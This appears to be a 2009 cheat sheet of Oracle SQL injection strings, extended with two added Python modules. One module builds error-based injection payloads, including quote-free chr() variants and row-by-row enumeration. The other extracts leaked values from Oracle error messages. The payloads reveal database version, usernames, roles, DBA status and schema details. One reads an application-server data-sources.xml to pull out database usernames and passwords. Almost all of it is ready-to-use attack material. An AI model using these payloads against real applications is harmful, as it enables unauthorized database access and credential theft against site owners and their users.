Oracle SQL Injection in web applications


Common SQL Injection Strings for Oracle Databases

Each entry lists the injected string (Command), what it does (Description), the privilege level it needs, and the Common Problems seen in practice. "[Demo picture]" marks a screenshot on the original page that is not reproduced here.

Command:
  ' or 1=utl_inaddr.get_host_address((select banner from v$version where rownum=1))--
Description:
  Display the database version information in an error message (injected into a string).
  utl_inaddr.get_host_address tries to resolve the subquery result as a host name; no such host exists, so the value is echoed back in the error "ORA-29257: host <value> unknown".
  [low privilege] [Demo picture]
Common Problems:
  • Java not installed
  • Oracle 11g ACL (the call then fails with ORA-24247 "network access denied by access control list" and leaks nothing)
  • PUBLIC execute privilege on UTL_INADDR removed
  ==> use an alternative function (see "Generating Oracle Error Messages" below)

Command:
  or 1=utl_inaddr.get_host_address((select banner from v$version where rownum=1))--
Description:
  Display the database version information in an error message (injected into an integer). Same as above, without the quote that closes a string literal.
  [low privilege] [Demo picture]
Common Problems:
  • Java not installed
  • Oracle 11g ACL
  • PUBLIC privilege removed
  ==> use an alternative function

Command:
  or 1=utl_inaddr.get_host_address((select sys.stragg (distinct username||chr(32)) from all_users))--
Description:
  Display a list of all usernames in a single error message (11g only; sys.stragg is an undocumented string aggregate).
  [low privilege] [Demo picture]
Common Problems:
  • stragg is limited to 4096 bytes
  • if stragg is not available, the same can be done using XMLDB (not yet documented here)

Command:
  or 1=utl_inaddr.get_host_address((select sys.stragg (distinct table_name||chr(61)||num_rows||chr(32)) from user_tables))--
Description:
  Display a list of all user tables and the number of rows (11g only). num_rows comes from the optimizer statistics and is NULL for tables that have never been analyzed.
  [low privilege] [Demo picture]
Common Problems:
  • stragg is limited to 4096 bytes
  • if stragg is not available, the same can be done using XMLDB

Command:
  or 1=utl_inaddr.get_host_address((Select granted_role from ( select rownum r, granted_role from user_role_privs) where r=1))
Description:
  Get the privileges (granted roles) of this account, one row per request. Iterate via r=1, r=2, r=3, ... until no further role comes back.
  [low privilege] [Demo picture]

Command:
  or 1=utl_inaddr.get_host_address((SELECT sys_context('USERENV', 'ISDBA') FROM dual))
  or, without single quotes:
  or 1=utl_inaddr.get_host_address((SELECT sys_context((select chr(85)||chr(83)||chr(69)||chr(82)||chr(69)||chr(78)||chr(86) from dual), (select chr(73)||chr(83)||chr(68)||chr(66)||chr(65) from dual)) FROM dual))
Description:
  Check whether the session has DBA privileges; result: TRUE or FALSE.
  If the single quotes return an ORA-00911 (invalid character), use the second string: the chr() chains spell USERENV and ISDBA without any quote.
  [low privilege] [Demo picture]

Command:
  or 1=utl_inaddr.get_host_address((select sys.stragg (distinct table_name||chr(58)||column_name||chr(58)||data_type||chr(58)||column_id||chr(59)) from user_tab_columns))--
Description:
  Get a list of all user tables including the column names and types, returned as table:column:type:position; entries. An ORDER BY on an aggregate query without GROUP BY is rejected by Oracle (ORA-00979), so the entries arrive in no defined order; the 4096-byte stragg limit applies.
  [low privilege]

Command:
  union select extractvalue(value(c), '/connection-factory/@user')||'/'||extractvalue(value(c), '/connection-factory/@password')||'@'||substr(extractvalue(value(c), '/connection-factory/@url'),instr(extractvalue(value(c), '/connection-factory/@url'),'//')+2) conn
  FROM table( XMLSequence( extract( xmltype( bfilename('GETPWDIR', 'data-sources.xml'), nls_charset_id('WE8ISO8859P1')), '/data-sources/connection-pool/connection-factory')) ) c
Description:
  Read files from the operating system using a simple SQL statement. The example parses an application server data-sources.xml and returns, for every connection-factory element, user/password@ followed by the part of the JDBC URL after "//".

Limitations:
  • An Oracle directory object (here GETPWDIR) pointing at the file's directory must exist, and the session needs READ on it
  • XML files only (the content has to be parsed by xmltype)
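The strings above differ only in where the payload is injected (string vs. integer), which scalar subquery is smuggled out, and whether quotes are allowed. The following Python module is an added example, not code from the original page: it assembles exactly those strings (including the chr()-encoded quote-free form and the rownum walk over user_role_privs) and sends nothing. The function names, parameter names and the wrapper labels are this example's own; the SQL inside the wrappers is the page's.

```python
"""Assembles the error-based Oracle injection strings listed in the table above.

Added example, not code from the original page: it only builds strings and
sends nothing. Function names, parameter names and the wrapper labels are
this example's own choices; the SQL inside the wrappers is the page's.
"""
import re

# Matches a single-quoted SQL literal; used when the target rejects quotes.
_LITERAL = re.compile(r"'([^']*)'")

# Error-raising functions that echo a scalar subquery result back in the
# error message. Labels are this example's; {q} is replaced by the subquery.
_WRAPPERS = {
    "utl_inaddr": "utl_inaddr.get_host_address(({q}))",                # ORA-29257
    "ord_dicom": "ordsys.ord_dicom.getmappingxpath(({q}),user,user)",  # ORA-53044
    "ctxsys": "CTXSYS.DRITHSX.SN(user,({q}))",                         # DRG-11701
}


def chr_encode(text: str) -> str:
    """'ISDBA' -> 'chr(73)||chr(83)||chr(68)||chr(66)||chr(65)': the same
    value as a quote-free expression. An empty literal becomes null."""
    return "||".join(f"chr({ord(c)})" for c in text) or "null"


def quote_free(sql: str) -> str:
    """Replace every '...' literal in sql with (select chr(..)||.. from dual),
    the form the page uses when quotes come back as ORA-00911."""
    return _LITERAL.sub(lambda m: f"(select {chr_encode(m.group(1))} from dual)", sql)


def error_probe(subquery: str, context: str = "integer",
                wrapper: str = "utl_inaddr", allow_quotes: bool = True) -> str:
    """Full injection string that leaks one scalar subquery result.

    context      "integer": the injection point is a bare number
                 "string":  the point is inside a quoted literal, so the
                            payload first closes that literal with a quote
    wrapper      which function carries the value into the error (see _WRAPPERS)
    allow_quotes False rewrites every literal in subquery as a chr() chain
    """
    if context not in ("integer", "string"):
        raise ValueError("context must be 'integer' or 'string'")
    if not allow_quotes:
        if context == "string":
            raise ValueError("closing a string literal needs a quote")
        subquery = quote_free(subquery)
    expr = _WRAPPERS[wrapper].format(q=subquery)
    prefix = "' " if context == "string" else ""
    return f"{prefix}or 1={expr}--"


def nth_row(column: str, table: str, n: int) -> str:
    """Scalar subquery for row n of one column: the rownum trick the page
    uses to walk user_role_privs one error message at a time."""
    return f"select {column} from (select rownum r, {column} from {table}) where r={n}"


def enumerate_rows(column: str, table: str, max_rows: int = 10, **probe_args) -> list:
    """Probes for rows 1..max_rows of a multi-row result. Stop sending when a
    response no longer carries a new value: the subquery has run out of rows."""
    return [error_probe(nth_row(column, table, n), **probe_args)
            for n in range(1, max_rows + 1)]
```

The wrapper parameter is what the "use an alternative function" advice above boils down to: when utl_inaddr is blocked by the 11g ACL or its PUBLIC grant is gone, the same subquery is carried out through ordsys.ord_dicom or CTXSYS.DRITHSX.SN instead, and only the error message that has to be parsed changes.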


Oracle Common Commands:

String Concatenation   Description
'a' || 'b'             concatenate 2 strings. This syntax can be used for the split-and-balance technique (a filtered value is assembled from pieces inside the injected string).
concat('a','b')        concatenate 2 strings via the concat function.

TBD                    Read files in SELECT statements.

Blind SQL Injection

Generating Oracle Error Messages containing information:

Alternatives to utl_inaddr.get_host_address when that function is not available (see Common Problems above). Each function raises an error that contains its argument, so the subquery result is returned in the message.

Command:
  1 or 1=ordsys.ord_dicom.getmappingxpath((select banner from v$version where rownum=1),user,user)--
Message:
  ORA-53044: Invalid Tag: ORACLE DATABASE 11G ENTERPRISE EDITION RELEASE 11.1.0.7.0 - PRODUCTION
  Requires the ORDSYS schema (Oracle Multimedia DICOM); note that the value is returned in upper case. [Demo picture]

Command:
  1 or 1=CTXSYS.DRITHSX.SN(user,(select banner from v$version where rownum=1))--
Message:
  ORA-20000: Oracle Text error: DRG-11701: Thesaurus Oracle Database 11g Enterprise Edition Release 11.1.0.7.0 - Production does not exist
  Requires the CTXSYS schema (Oracle Text). [Demo picture]

will be continued
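Whichever of the three functions carries the value out, the attacker's remaining work is pulling it back out of the error text, and recognising the case where the 11g ACL blocked utl_inaddr before anything leaked. The following Python module is an added example, not code from the original page; the response strings in it are constructed for the example and were not captured from any system, the Oracle message wording is the standard one, and the channel labels are this example's own.

```python
"""Recovers the value an error-based probe leaked from the server's error text.

Added example, not code from the original page. The response strings below
are constructed for this example and were not captured from any system; the
Oracle message wording is standard, the channel labels are this example's.
"""
import re

# (label, pattern) for the three error messages the page shows.
_LEAKS = [
    ("utl_inaddr", re.compile(r"ORA-29257: host (.+) unknown")),
    ("ord_dicom", re.compile(r"ORA-53044: Invalid Tag: ([^\r\n]+)")),
    ("ctxsys", re.compile(r"DRG-11701: Thesaurus (.+) does not exist")),
]
# 11g network ACL refusal: the utl_inaddr path is blocked and leaks nothing.
_ACL_BLOCKED = re.compile(r"ORA-24247: network access denied by access control list")

# Constructed sample responses (not real captures).
SAMPLE_RESPONSES = {
    "utl_inaddr": ('<pre>ORA-29257: host Oracle Database 11g Enterprise Edition '
                   'Release 11.1.0.7.0 - Production unknown\n'
                   'ORA-06512: at "SYS.UTL_INADDR", line 4</pre>'),
    "ord_dicom": ('java.sql.SQLException: ORA-53044: Invalid Tag: ORACLE DATABASE 11G '
                  'ENTERPRISE EDITION RELEASE 11.1.0.7.0 - PRODUCTION\n'),
    "ctxsys": ('ORA-20000: Oracle Text error:\nDRG-11701: Thesaurus Oracle Database 11g '
               'Enterprise Edition Release 11.1.0.7.0 - Production does not exist\n'),
    "acl": ('ORA-24247: network access denied by access control list (ACL)\n'
            'ORA-06512: at "SYS.UTL_INADDR", line 4\n'),
    "clean": "<html>Welcome back</html>",
}


def extract_leak(response: str):
    """Return (label, value) for the first recognised error message,
    ("acl_blocked", None) when ORA-24247 shows the ACL stopped utl_inaddr,
    or None when the response carries no usable error text."""
    for label, pattern in _LEAKS:
        m = pattern.search(response)
        if m:
            return label, m.group(1).strip()
    if _ACL_BLOCKED.search(response):
        return "acl_blocked", None
    return None


def split_stragg(value: str, sep: str = " ") -> list:
    """Split a value built with sys.stragg(...||chr(32)) back into its items;
    the page's user_tab_columns string uses chr(59) (';') as separator."""
    return [item for item in value.split(sep) if item]


def leaked_values(responses: list) -> list:
    """Values recovered from a series of responses, e.g. the rownum walk over
    user_role_privs; stops at the first response that leaks nothing."""
    out = []
    for r in responses:
        hit = extract_leak(r)
        if not hit or hit[1] is None:
            break
        out.append(hit[1])
    return out
```

The ORA-24247 branch is the practical reading of the "Oracle 11g ACL" problem listed above: the error is there, but it names the ACL and not the subquery result, so a parser that only looks for ORA-29257 would treat a blocked probe like a silent one.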
© 2009 by Red-Database-Security GmbH - last update 04-feb-2009